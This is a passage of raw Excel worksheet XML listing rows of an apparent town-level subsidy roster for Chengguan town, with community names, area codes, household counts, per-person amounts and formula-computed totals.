      <c r="E1123" s="43" t="s">
        <v>624</v>
      </c>
      <c r="F1123" s="33" t="s">
        <v>266</v>
      </c>
      <c r="G1123" s="24">
        <v>1</v>
      </c>
      <c r="H1123" s="25">
        <v>365</v>
      </c>
      <c r="I1123" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1123" s="41">
        <v>45536</v>
      </c>
      <c r="K1123" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1124" customHeight="1" spans="1:11">
      <c r="A1124" s="23" t="s">
        <v>3008</v>
      </c>
      <c r="B1124" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1124" s="27" t="s">
        <v>3009</v>
      </c>
      <c r="D1124" s="27" t="s">
        <v>3010</v>
      </c>
      <c r="E1124" s="43" t="s">
        <v>3011</v>
      </c>
      <c r="F1124" s="27" t="s">
        <v>233</v>
      </c>
      <c r="G1124" s="24">
        <v>1</v>
      </c>
      <c r="H1124" s="25">
        <v>365</v>
      </c>
      <c r="I1124" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1124" s="41">
        <v>45505</v>
      </c>
      <c r="K1124" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1125" customHeight="1" spans="1:11">
      <c r="A1125" s="23" t="s">
        <v>3012</v>
      </c>
      <c r="B1125" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1125" s="44" t="s">
        <v>2032</v>
      </c>
      <c r="D1125" s="43" t="s">
        <v>3013</v>
      </c>
      <c r="E1125" s="29" t="s">
        <v>524</v>
      </c>
      <c r="F1125" s="45">
        <v>4113210108</v>
      </c>
      <c r="G1125" s="24">
        <v>1</v>
      </c>
      <c r="H1125" s="25">
        <v>365</v>
      </c>
      <c r="I1125" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1125" s="41">
        <v>45566</v>
      </c>
      <c r="K1125" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1126" customHeight="1" spans="1:11">
      <c r="A1126" s="23" t="s">
        <v>3014</v>
      </c>
      <c r="B1126" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1126" s="27" t="s">
        <v>2051</v>
      </c>
      <c r="D1126" s="27" t="s">
        <v>3015</v>
      </c>
      <c r="E1126" s="29" t="s">
        <v>947</v>
      </c>
      <c r="F1126" s="27">
        <v>4113210106</v>
      </c>
      <c r="G1126" s="24">
        <v>1</v>
      </c>
      <c r="H1126" s="25">
        <v>365</v>
      </c>
      <c r="I1126" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1126" s="41">
        <v>45566</v>
      </c>
      <c r="K1126" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1127" customHeight="1" spans="1:11">
      <c r="A1127" s="23" t="s">
        <v>3016</v>
      </c>
      <c r="B1127" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1127" s="27" t="s">
        <v>3017</v>
      </c>
      <c r="D1127" s="27" t="s">
        <v>3018</v>
      </c>
      <c r="E1127" s="43" t="s">
        <v>3019</v>
      </c>
      <c r="F1127" s="24">
        <v>4113210105</v>
      </c>
      <c r="G1127" s="24">
        <v>1</v>
      </c>
      <c r="H1127" s="25">
        <v>365</v>
      </c>
      <c r="I1127" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1127" s="41">
        <v>45566</v>
      </c>
      <c r="K1127" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1128" customHeight="1" spans="1:11">
      <c r="A1128" s="23" t="s">
        <v>3020</v>
      </c>
      <c r="B1128" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1128" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D1128" s="27" t="s">
        <v>3021</v>
      </c>
      <c r="E1128" s="27" t="s">
        <v>3022</v>
      </c>
      <c r="F1128" s="24">
        <v>4113210103</v>
      </c>
      <c r="G1128" s="24">
        <v>1</v>
      </c>
      <c r="H1128" s="25">
        <v>365</v>
      </c>
      <c r="I1128" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1128" s="41">
        <v>45566</v>
      </c>
      <c r="K1128" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1129" customHeight="1" spans="1:11">
      <c r="A1129" s="23" t="s">
        <v>3023</v>
      </c>
      <c r="B1129" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1129" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D1129" s="27" t="s">
        <v>3024</v>
      </c>
      <c r="E1129" s="27" t="s">
        <v>1214</v>
      </c>
      <c r="F1129" s="24">
        <v>4113210103</v>
      </c>
      <c r="G1129" s="24">
        <v>1</v>
      </c>
      <c r="H1129" s="25">
        <v>365</v>
      </c>
      <c r="I1129" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1129" s="41">
        <v>45597</v>
      </c>
      <c r="K1129" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1130" customHeight="1" spans="1:11">
      <c r="A1130" s="23" t="s">
        <v>3025</v>
      </c>
      <c r="B1130" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1130" s="27" t="s">
        <v>2035</v>
      </c>
      <c r="D1130" s="27" t="s">
        <v>3026</v>
      </c>
      <c r="E1130" s="27" t="s">
        <v>3027</v>
      </c>
      <c r="F1130" s="24">
        <v>4113210103</v>
      </c>
      <c r="G1130" s="24">
        <v>2</v>
      </c>
      <c r="H1130" s="25">
        <v>325</v>
      </c>
      <c r="I1130" s="24">
        <f t="shared" si="17"/>
        <v>650</v>
      </c>
      <c r="J1130" s="41">
        <v>45597</v>
      </c>
      <c r="K1130" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1131" customHeight="1" spans="1:11">
      <c r="A1131" s="23" t="s">
        <v>3028</v>
      </c>
      <c r="B1131" s="24" t="str">
        <f>B1130</f>
        <v>城关镇</v>
      </c>
      <c r="C1131" s="24" t="str">
        <f>C1130</f>
        <v>东北社区</v>
      </c>
      <c r="D1131" s="26" t="s">
        <v>3029</v>
      </c>
      <c r="E1131" s="26" t="s">
        <v>3030</v>
      </c>
      <c r="F1131" s="24">
        <f>F1130</f>
        <v>4113210103</v>
      </c>
      <c r="G1131" s="24"/>
      <c r="H1131" s="24"/>
      <c r="I1131" s="24">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="J1131" s="41"/>
      <c r="K1131" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1132" customHeight="1" spans="1:11">
      <c r="A1132" s="23" t="s">
        <v>3031</v>
      </c>
      <c r="B1132" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1132" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1132" s="27" t="s">
        <v>3032</v>
      </c>
      <c r="E1132" s="27" t="s">
        <v>958</v>
      </c>
      <c r="F1132" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1132" s="24">
        <v>1</v>
      </c>
      <c r="H1132" s="25">
        <v>365</v>
      </c>
      <c r="I1132" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1132" s="41">
        <v>45597</v>
      </c>
      <c r="K1132" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1133" customHeight="1" spans="1:11">
      <c r="A1133" s="23" t="s">
        <v>3033</v>
      </c>
      <c r="B1133" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1133" s="27" t="s">
        <v>3034</v>
      </c>
      <c r="D1133" s="27" t="s">
        <v>3035</v>
      </c>
      <c r="E1133" s="27" t="s">
        <v>288</v>
      </c>
      <c r="F1133" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1133" s="24">
        <v>1</v>
      </c>
      <c r="H1133" s="25">
        <v>365</v>
      </c>
      <c r="I1133" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1133" s="41">
        <v>45597</v>
      </c>
      <c r="K1133" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1134" customHeight="1" spans="1:11">
      <c r="A1134" s="23" t="s">
        <v>3036</v>
      </c>
      <c r="B1134" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1134" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D1134" s="24" t="s">
        <v>3037</v>
      </c>
      <c r="E1134" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F1134" s="24">
        <v>4113210103</v>
      </c>
      <c r="G1134" s="24">
        <v>1</v>
      </c>
      <c r="H1134" s="25">
        <v>365</v>
      </c>
      <c r="I1134" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1134" s="41">
        <v>45627</v>
      </c>
      <c r="K1134" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1135" customHeight="1" spans="1:11">
      <c r="A1135" s="23" t="s">
        <v>3038</v>
      </c>
      <c r="B1135" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1135" s="24" t="s">
        <v>1674</v>
      </c>
      <c r="D1135" s="24" t="s">
        <v>3039</v>
      </c>
      <c r="E1135" s="24" t="s">
        <v>519</v>
      </c>
      <c r="F1135" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G1135" s="24">
        <v>1</v>
      </c>
      <c r="H1135" s="25">
        <v>365</v>
      </c>
      <c r="I1135" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1135" s="41">
        <v>45658</v>
      </c>
      <c r="K1135" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1136" customHeight="1" spans="1:11">
      <c r="A1136" s="23" t="s">
        <v>3040</v>
      </c>
      <c r="B1136" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1136" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1136" s="24" t="s">
        <v>3041</v>
      </c>
      <c r="E1136" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F1136" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1136" s="24">
        <v>1</v>
      </c>
      <c r="H1136" s="25">
        <v>365</v>
      </c>
      <c r="I1136" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1136" s="41">
        <v>45658</v>
      </c>
      <c r="K1136" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1137" customHeight="1" spans="1:14">
      <c r="A1137" s="23" t="s">
        <v>3042</v>
      </c>
      <c r="B1137" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1137" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1137" s="24" t="s">
        <v>3043</v>
      </c>
      <c r="E1137" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F1137" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1137" s="24">
        <v>1</v>
      </c>
      <c r="H1137" s="25">
        <v>365</v>
      </c>
      <c r="I1137" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1137" s="41">
        <v>45658</v>
      </c>
      <c r="K1137" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1138" customHeight="1" spans="1:14">
      <c r="A1138" s="23" t="s">
        <v>3044</v>
      </c>
      <c r="B1138" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1138" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1138" s="24" t="s">
        <v>3045</v>
      </c>
      <c r="E1138" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F1138" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1138" s="24">
        <v>1</v>
      </c>
      <c r="H1138" s="25">
        <v>365</v>
      </c>
      <c r="I1138" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1138" s="41">
        <v>45658</v>
      </c>
      <c r="K1138" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1139" customHeight="1" spans="1:14">
      <c r="A1139" s="23" t="s">
        <v>3046</v>
      </c>
      <c r="B1139" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1139" s="24" t="s">
        <v>3047</v>
      </c>
      <c r="D1139" s="24" t="s">
        <v>3048</v>
      </c>
      <c r="E1139" s="24" t="s">
        <v>627</v>
      </c>
      <c r="F1139" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1139" s="24">
        <v>1</v>
      </c>
      <c r="H1139" s="25">
        <v>400</v>
      </c>
      <c r="I1139" s="24">
        <f t="shared" si="17"/>
        <v>400</v>
      </c>
      <c r="J1139" s="41">
        <v>45658</v>
      </c>
      <c r="K1139" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1140" customHeight="1" spans="1:14">
      <c r="A1140" s="23" t="s">
        <v>3049</v>
      </c>
      <c r="B1140" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1140" s="24" t="s">
        <v>3050</v>
      </c>
      <c r="D1140" s="24" t="s">
        <v>3051</v>
      </c>
      <c r="E1140" s="24" t="s">
        <v>1689</v>
      </c>
      <c r="F1140" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1140" s="24">
        <v>1</v>
      </c>
      <c r="H1140" s="25">
        <v>365</v>
      </c>
      <c r="I1140" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1140" s="41">
        <v>45658</v>
      </c>
      <c r="K1140" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1141" customHeight="1" spans="1:14">
      <c r="A1141" s="23" t="s">
        <v>3052</v>
      </c>
      <c r="B1141" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1141" s="27" t="s">
        <v>2032</v>
      </c>
      <c r="D1141" s="27" t="s">
        <v>3053</v>
      </c>
      <c r="E1141" s="27" t="s">
        <v>3054</v>
      </c>
      <c r="F1141" s="24">
        <v>4113210106</v>
      </c>
      <c r="G1141" s="24">
        <v>1</v>
      </c>
      <c r="H1141" s="25">
        <v>365</v>
      </c>
      <c r="I1141" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1141" s="41">
        <v>45627</v>
      </c>
      <c r="K1141" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1142" customHeight="1" spans="1:14">
      <c r="A1142" s="23" t="s">
        <v>3055</v>
      </c>
      <c r="B1142" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1142" s="27" t="s">
        <v>2035</v>
      </c>
      <c r="D1142" s="27" t="s">
        <v>3056</v>
      </c>
      <c r="E1142" s="27" t="s">
        <v>340</v>
      </c>
      <c r="F1142" s="46">
        <v>4113210103</v>
      </c>
      <c r="G1142" s="24">
        <v>2</v>
      </c>
      <c r="H1142" s="25">
        <v>325</v>
      </c>
      <c r="I1142" s="24">
        <f t="shared" si="17"/>
        <v>650</v>
      </c>
      <c r="J1142" s="41">
        <v>45689</v>
      </c>
      <c r="K1142" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1143" customHeight="1" spans="1:14">
      <c r="A1143" s="23" t="s">
        <v>3057</v>
      </c>
      <c r="B1143" s="24" t="str">
        <f>B1142</f>
        <v>城关镇</v>
      </c>
      <c r="C1143" s="27" t="str">
        <f>C1142</f>
        <v>东北社区</v>
      </c>
      <c r="D1143" s="26" t="s">
        <v>3058</v>
      </c>
      <c r="E1143" s="26" t="s">
        <v>1668</v>
      </c>
      <c r="F1143" s="24">
        <f>F1142</f>
        <v>4113210103</v>
      </c>
      <c r="G1143" s="24"/>
      <c r="H1143" s="24"/>
      <c r="I1143" s="24">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="J1143" s="41"/>
      <c r="K1143" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1144" customHeight="1" spans="1:14">
      <c r="A1144" s="23" t="s">
        <v>3059</v>
      </c>
      <c r="B1144" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1144" s="27" t="s">
        <v>3050</v>
      </c>
      <c r="D1144" s="27" t="s">
        <v>3060</v>
      </c>
      <c r="E1144" s="27" t="s">
        <v>239</v>
      </c>
      <c r="F1144" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1144" s="24">
        <v>1</v>
      </c>
      <c r="H1144" s="25">
        <v>365</v>
      </c>
      <c r="I1144" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1144" s="41">
        <v>45717</v>
      </c>
      <c r="K1144" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1145" customHeight="1" spans="1:14">
      <c r="A1145" s="23" t="s">
        <v>3061</v>
      </c>
      <c r="B1145" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1145" s="27" t="s">
        <v>2832</v>
      </c>
      <c r="D1145" s="27" t="s">
        <v>3062</v>
      </c>
      <c r="E1145" s="27" t="s">
        <v>1328</v>
      </c>
      <c r="F1145" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1145" s="24">
        <v>1</v>
      </c>
      <c r="H1145" s="25">
        <v>365</v>
      </c>
      <c r="I1145" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1145" s="41">
        <v>45717</v>
      </c>
      <c r="K1145" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1146" customHeight="1" spans="1:14">
      <c r="A1146" s="23" t="s">
        <v>3063</v>
      </c>
      <c r="B1146" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1146" s="27" t="s">
        <v>3064</v>
      </c>
      <c r="D1146" s="27" t="s">
        <v>3065</v>
      </c>
      <c r="E1146" s="27" t="s">
        <v>3066</v>
      </c>
      <c r="F1146" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1146" s="24">
        <v>1</v>
      </c>
      <c r="H1146" s="25">
        <v>365</v>
      </c>
      <c r="I1146" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1146" s="41">
        <v>45717</v>
      </c>
      <c r="K1146" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1147" customHeight="1" spans="1:14">
      <c r="A1147" s="23" t="s">
        <v>3067</v>
      </c>
      <c r="B1147" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1147" s="27" t="s">
        <v>3068</v>
      </c>
      <c r="D1147" s="27" t="s">
        <v>3069</v>
      </c>
      <c r="E1147" s="27" t="s">
        <v>389</v>
      </c>
      <c r="F1147" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1147" s="24">
        <v>1</v>
      </c>
      <c r="H1147" s="25">
        <v>365</v>
      </c>
      <c r="I1147" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1147" s="41">
        <v>45717</v>
      </c>
      <c r="K1147" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1148" customHeight="1" spans="1:14">
      <c r="A1148" s="23" t="s">
        <v>3070</v>
      </c>
      <c r="B1148" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1148" s="27" t="s">
        <v>318</v>
      </c>
      <c r="D1148" s="27" t="s">
        <v>3071</v>
      </c>
      <c r="E1148" s="27" t="s">
        <v>1963</v>
      </c>
      <c r="F1148" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1148" s="24">
        <v>1</v>
      </c>
      <c r="H1148" s="25">
        <v>365</v>
      </c>
      <c r="I1148" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1148" s="41">
        <v>45717</v>
      </c>
      <c r="K1148" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1149" customHeight="1" spans="1:14">
      <c r="A1149" s="23" t="s">
        <v>3072</v>
      </c>
      <c r="B1149" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1149" s="27" t="s">
        <v>637</v>
      </c>
      <c r="D1149" s="27" t="s">
        <v>3073</v>
      </c>
      <c r="E1149" s="27" t="s">
        <v>222</v>
      </c>
      <c r="F1149" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1149" s="24">
        <v>1</v>
      </c>
      <c r="H1149" s="25">
        <v>365</v>
      </c>
      <c r="I1149" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1149" s="41">
        <v>45717</v>
      </c>
      <c r="K1149" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1150" customHeight="1" spans="1:14">
      <c r="A1150" s="23" t="s">
        <v>3074</v>
      </c>
      <c r="B1150" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1150" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1150" s="24" t="s">
        <v>3075</v>
      </c>
      <c r="E1150" s="24" t="s">
        <v>411</v>
      </c>
      <c r="F1150" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1150" s="24">
        <v>1</v>
      </c>
      <c r="H1150" s="25">
        <v>365</v>
      </c>
      <c r="I1150" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1150" s="41">
        <v>45108</v>
      </c>
      <c r="K1150" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1151" s="1" customFormat="1" customHeight="1" spans="1:14">
      <c r="A1151" s="23" t="s">
        <v>3076</v>
      </c>
      <c r="B1151" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1151" s="27" t="s">
        <v>3077</v>
      </c>
      <c r="D1151" s="27" t="s">
        <v>3078</v>
      </c>
      <c r="E1151" s="29" t="s">
        <v>3079</v>
      </c>
      <c r="F1151" s="27" t="s">
        <v>233</v>
      </c>
      <c r="G1151" s="24">
        <v>1</v>
      </c>
      <c r="H1151" s="25">
        <v>365</v>
      </c>
      <c r="I1151" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1151" s="47" t="s">
        <v>3080</v>
      </c>
      <c r="K1151" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1151" s="8"/>
      <c r="M1151" s="8"/>
      <c r="N1151" s="8"/>
    </row>
    <row r="1152" s="1" customFormat="1" customHeight="1" spans="1:14">
      <c r="A1152" s="23" t="s">
        <v>3081</v>
      </c>
      <c r="B1152" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1152" s="27" t="s">
        <v>2032</v>
      </c>
      <c r="D1152" s="27" t="s">
        <v>3082</v>
      </c>
      <c r="E1152" s="29" t="s">
        <v>3083</v>
      </c>
      <c r="F1152" s="27" t="s">
        <v>233</v>
      </c>
      <c r="G1152" s="24">
        <v>1</v>
      </c>
      <c r="H1152" s="25">
        <v>365</v>
      </c>
      <c r="I1152" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1152" s="47" t="s">
        <v>3080</v>
      </c>
      <c r="K1152" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1152" s="8"/>
      <c r="M1152" s="8"/>
      <c r="N1152" s="8"/>
    </row>
    <row r="1153" s="3" customFormat="1" customHeight="1" spans="1:14">
      <c r="A1153" s="23" t="s">
        <v>3084</v>
      </c>
      <c r="B1153" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1153" s="27" t="s">
        <v>3017</v>
      </c>
      <c r="D1153" s="27" t="s">
        <v>3085</v>
      </c>
      <c r="E1153" s="29" t="s">
        <v>3086</v>
      </c>
      <c r="F1153" s="27">
        <v>4113210105</v>
      </c>
      <c r="G1153" s="24">
        <v>1</v>
      </c>
      <c r="H1153" s="25">
        <v>365</v>
      </c>
      <c r="I1153" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1153" s="47" t="s">
        <v>3080</v>
      </c>
      <c r="K1153" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1153" s="8"/>
      <c r="M1153" s="8"/>
      <c r="N1153" s="8"/>
    </row>
    <row r="1154" s="2" customFormat="1" customHeight="1" spans="1:14">
      <c r="A1154" s="23" t="s">
        <v>3087</v>
      </c>
      <c r="B1154" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1154" s="27" t="s">
        <v>286</v>
      </c>
      <c r="D1154" s="27" t="s">
        <v>3088</v>
      </c>
      <c r="E1154" s="29" t="s">
        <v>3089</v>
      </c>
      <c r="F1154" s="27" t="s">
        <v>289</v>
      </c>
      <c r="G1154" s="34">
        <v>2</v>
      </c>
      <c r="H1154" s="48">
        <v>325</v>
      </c>
      <c r="I1154" s="24">
        <f t="shared" si="17"/>
        <v>650</v>
      </c>
      <c r="J1154" s="47" t="s">
        <v>3090</v>
      </c>
      <c r="K1154" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1154" s="8"/>
      <c r="M1154" s="8"/>
      <c r="N1154" s="8"/>
    </row>
    <row r="1155" s="2" customFormat="1" customHeight="1" spans="1:14">
      <c r="A1155" s="23" t="s">
        <v>3091</v>
      </c>
      <c r="B1155" s="24" t="str">
        <f>B1154</f>
        <v>城关镇</v>
      </c>
      <c r="C1155" s="27" t="str">
        <f>C1154</f>
        <v>北外村</v>
      </c>
      <c r="D1155" s="27" t="s">
        <v>3092</v>
      </c>
      <c r="E1155" s="27" t="s">
        <v>3093</v>
      </c>
      <c r="F1155" s="27" t="str">
        <f>F1154</f>
        <v>4113210102</v>
      </c>
      <c r="G1155" s="24"/>
      <c r="H1155" s="24"/>
      <c r="I1155" s="24">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="J1155" s="34"/>
      <c r="K1155" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1155" s="8"/>
      <c r="M1155" s="8"/>
      <c r="N1155" s="8"/>
    </row>
    <row r="1156" s="2" customFormat="1" customHeight="1" spans="1:14">
      <c r="A1156" s="23" t="s">
        <v>3094</v>
      </c>
      <c r="B1156" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1156" s="27" t="s">
        <v>3095</v>
      </c>
      <c r="D1156" s="27" t="s">
        <v>3096</v>
      </c>
      <c r="E1156" s="29" t="s">
        <v>239</v>
      </c>
      <c r="F1156" s="27">
        <v>4113210108</v>
      </c>
      <c r="G1156" s="24">
        <v>1</v>
      </c>
      <c r="H1156" s="25">
        <v>365</v>
      </c>
      <c r="I1156" s="24">
        <f t="shared" ref="I1156:I1219" si="18">H1156*G1156</f>
        <v>365</v>
      </c>
      <c r="J1156" s="34" t="s">
        <v>3090</v>
      </c>
      <c r="K1156" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1156" s="8"/>
      <c r="M1156" s="8"/>
      <c r="N1156" s="8"/>
    </row>
    <row r="1157" s="2" customFormat="1" customHeight="1" spans="1:14">
      <c r="A1157" s="23" t="s">
        <v>3097</v>
      </c>
      <c r="B1157" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1157" s="27" t="s">
        <v>3095</v>
      </c>
      <c r="D1157" s="27" t="s">
        <v>3098</v>
      </c>
      <c r="E1157" s="29" t="s">
        <v>765</v>
      </c>
      <c r="F1157" s="27">
        <v>4113210108</v>
      </c>
      <c r="G1157" s="24">
        <v>1</v>
      </c>
      <c r="H1157" s="25">
        <v>365</v>
      </c>
      <c r="I1157" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1157" s="34" t="s">
        <v>3090</v>
      </c>
      <c r="K1157" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1157" s="8"/>
      <c r="M1157" s="8"/>
      <c r="N1157" s="8"/>
    </row>
    <row r="1158" customFormat="1" customHeight="1" spans="1:14">
      <c r="A1158" s="23" t="s">
        <v>3099</v>
      </c>
      <c r="B1158" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1158" s="27" t="s">
        <v>1026</v>
      </c>
      <c r="D1158" s="27" t="s">
        <v>3100</v>
      </c>
      <c r="E1158" s="29" t="s">
        <v>3101</v>
      </c>
      <c r="F1158" s="27">
        <v>4113210103</v>
      </c>
      <c r="G1158" s="24">
        <v>1</v>
      </c>
      <c r="H1158" s="25">
        <v>365</v>
      </c>
      <c r="I1158" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1158" s="38" t="s">
        <v>3090</v>
      </c>
      <c r="K1158" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1158" s="8"/>
      <c r="M1158" s="8"/>
      <c r="N1158" s="8"/>
    </row>
    <row r="1159" customFormat="1" customHeight="1" spans="1:14">
      <c r="A1159" s="23" t="s">
        <v>3102</v>
      </c>
      <c r="B1159" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1159" s="27" t="s">
        <v>1026</v>
      </c>
      <c r="D1159" s="27" t="s">
        <v>3103</v>
      </c>
      <c r="E1159" s="29" t="s">
        <v>236</v>
      </c>
      <c r="F1159" s="27">
        <v>4113210103</v>
      </c>
      <c r="G1159" s="24">
        <v>1</v>
      </c>
      <c r="H1159" s="25">
        <v>365</v>
      </c>
      <c r="I1159" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1159" s="38" t="s">
        <v>3090</v>
      </c>
      <c r="K1159" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1159" s="8"/>
      <c r="M1159" s="8"/>
      <c r="N1159" s="8"/>
    </row>
    <row r="1160" customHeight="1" spans="1:14">
      <c r="A1160" s="23" t="s">
        <v>3104</v>
      </c>
      <c r="B1160" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1160" s="24" t="s">
        <v>2633</v>
      </c>
      <c r="D1160" s="24" t="s">
        <v>3105</v>
      </c>
      <c r="E1160" s="24" t="s">
        <v>3106</v>
      </c>
      <c r="F1160" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G1160" s="24">
        <v>1</v>
      </c>
      <c r="H1160" s="25">
        <v>365</v>
      </c>
      <c r="I1160" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1160" s="41">
        <v>45108</v>
      </c>
      <c r="K1160" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1161" customHeight="1" spans="1:14">
